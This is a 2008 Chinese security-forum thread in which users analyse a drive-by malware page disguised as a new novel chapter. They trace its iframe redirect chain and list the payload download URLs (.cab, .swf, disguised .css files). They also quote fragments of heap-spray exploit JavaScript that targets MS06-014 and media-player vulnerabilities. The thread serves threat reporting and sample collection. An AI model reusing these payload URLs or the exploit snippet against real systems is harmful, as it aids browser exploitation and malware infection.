毒网一只

iuan

毒网一只http://www.sdvcxx.cn/uumeimg/37/65478.htm ,,在百度魔运苍茫吧看书里，

骗子贴出骗人是新章的的连接，会在tmp生成一个自动指行文件，本机nod2.7监控没反应

[ 本帖最后由 iuan 于 2008-7-20 09:06 编辑 ]

电影结束了

http://user1.sony333.cn/versionie.swf
http://user1.sony333.cn/bak6.css
http://user1.sony333.cn/Baidu.cab
随便找了个...
继续挖了...

[ 本帖最后由 电影结束了 于 2008-7-20 09:44 编辑 ]

aabbcc13165557

kill

ranguangning

http://www.pang753.cn/a17.htm→http://www.sony16.cn/ghost.html→clsid:BD96C556-65A3-11D0-983A-00C04FC29E36，document.write("<script src=http:\/\/user1.sony333.cn\/ms06014.js><\/script>")，clsid:d27cdb6e-ae6d-11cf-96b8-444553540000→codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">')，还有UUSEE，暴风，real，百度搜霸，迅雷等漏洞→http://user1.sony333.cn/versionie.swf，http://user1.sony333.cn/Baidu.cab", "Baidu.exe"，http://dz.us.net/bak.css，jWWtph/th:./aidb.iou/crmygiens（MS某个作者的地址），ocument.writeln("var AntiVir = unescape(\"%u9090\"+\"%u9090\");");

document.writeln("var Norton = 20;");

document.writeln("var DrWeb = Norton+QuadroXFX.length;");【还看到个mcafee】

document.writeln("while (AntiVir.length<DrWeb) AntiVir+=AntiVir;");

document.writeln("fillblock = AntiVir.substring(0, DrWeb);")。

【挂的太多】【红伞会报一些关键的网页】【只抓到个报主网页的】



[ 本帖最后由 ranguangning 于 2008-7-20 09:45 编辑 ]

saber123

畅游报

qigang

Log is generated by FreShow.
[wide]http://www.sdvcxx.cn/uumeimg/37/65478.htm
    [frame]http://www.pang753.cn/a17.htm
        [frame]http://www.sony16.cn/ghost.html
            [object]http://user1.sony333.cn/versionff.swf
            [object]http://user1.sony333.cn/versionie.swf
            [object]http://user1.sony333.cn/Baidu.cab
            [script]http://user1.sony333.cn/ms06014.js
                [object]http://user1.sony333.cn/bak0.css
            [frame]http://user1.sony333.cn/GLWORLD.html
                [object]http://dz.us.net/bak.css
            [script]http://user1.sony333.cn/real.js
                [object]http://dz.us.net/bak.css
            [frame]http://user1.sony333.cn/Real.html
                [object]http://dz.us.net/bak.css
            [frame]http://user1.sony333.cn/Thunder.html
                [object]http://dz.us.net/bak.css
            [frame]http://user1.sony333.cn/off.html
                [object]http://user1.sony333.cn/bak6.css
        [script]http://js.users.51.la/1937298.js
    [frame]http://union.mop.com/ushow.jsp?idea=423&user=11518
        [script]http://ps.itv.mop.com/today/piclist_day.js
        [script]http://ps.itv.mop.com/today/rndnum.js
        [script]http://ps.itv.mop.com/today/unionimages2/tj.txt
    [frame]http://union.mop.com/ushow.jsp?idea=419&user=11518
        [script]http://ps.itv.mop.com/today/piclist_day.js
        [script]http://ps.itv.mop.com/today/rndnum.js
        [script]http://ps.itv.mop.com/today/unionimages2/tj.txt
    [frame]http://union.mop.com/ushow.jsp?idea=419&user=11518
    [frame]http://union.mop.com/ushow.jsp?idea=423&user=11518
    [frame]http://union.mop.com/ushow.jsp?idea=423&user=11518
    [frame]http://union.mop.com/ushow.jsp?idea=423&user=11518
    [script]http://pop.9v.cn/code/popjs.asp?uid=33317&tid=35&l=0&c=1
    [script]http://u.ads8.com/showpage.php?pid=43482&show_t=2
    [script]http://count41.51yes.com/click.aspx?id=419796644&logo=11
        [frame]http://count41.51yes.com/sa.aspx?id=419796644'+yesdata+'

下载地址:

http://user1.sony333.cn/Baidu.cab
http://user1.sony333.cn/versionie.swf
http://user1.sony333.cn/versionff.swf
http://user1.sony333.cn/bak0.css
http://dz.us.net/bak.css
http://user1.sony333.cn/bak6.css

saber123

随便点个连接

代码:
<img width='0' height='0' src='http://tj.mop.com/display.html?80112|11518|423|receiver|0|mopgreen'>
<img width="0" height="0" src="http://tjj.itv.mop.com/pv?id=0">
</div>
<iframe src="http://union.mop.com/upage.jsp" width="0" height="0"></iframe>
document.write('<image src="http://union.mop.com/upv.jsp" height=0 width=0>');

jimmyleo

http://dz.us.net/bak.css

这个是针对FreShow的障眼法

jimmyleo

真正的地址是
http://user1.sony333.cn/bak2.css

qigang

原帖由 jimmyleo 于 2008-7-20 09:56 发表
真正的地址是
http://user1.sony333.cn/bak2.css

嘿嘿,多多指教.